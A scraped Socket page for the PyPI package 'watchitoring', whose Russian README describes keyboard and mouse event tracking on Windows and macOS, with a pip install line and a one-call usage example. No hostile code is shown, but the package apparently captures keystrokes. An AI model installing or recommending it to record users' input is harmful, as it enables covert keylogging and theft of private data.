Launch Week Day 5: Introducing Reachability for PHP.Learn More
Socket
Book a DemoSign in
Socket

watchitoring

Package Overview
Dependencies
Maintainers
1
Versions
2
Alerts
File Explorer

Advanced tools

Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install

watchitoring

Кроссплатформенная библиотека для мониторинга системных событий

pipPyPI
Version
0.1.1
Maintainers
1

watchitoring

watchitoring - это Python-библиотека для мониторинга системных событий, включая отслеживание клавиатуры и мыши. Библиотека поддерживает Windows и macOS.

Установка

pip install watchitoring

Требования

  • Python 3.6+
  • Windows или macOS
  • Для Windows: pywin32
  • Для macOS: pyobjc-framework-Cocoa
  • pynput

Использование

from watchitoring import initialize_system_monitoring

# Запуск мониторинга системы
initialize_system_monitoring()

Особенности

  • Кроссплатформенная поддержка (Windows и macOS)
  • Легкая интеграция

Лицензия

MIT

FAQs

Did you know?

Socket

Socket for GitHub automatically highlights issues in each pull request and monitors the health of all your open source dependencies. Discover the contents of your packages and block harmful activity before you install or update your dependencies.

Install

Related posts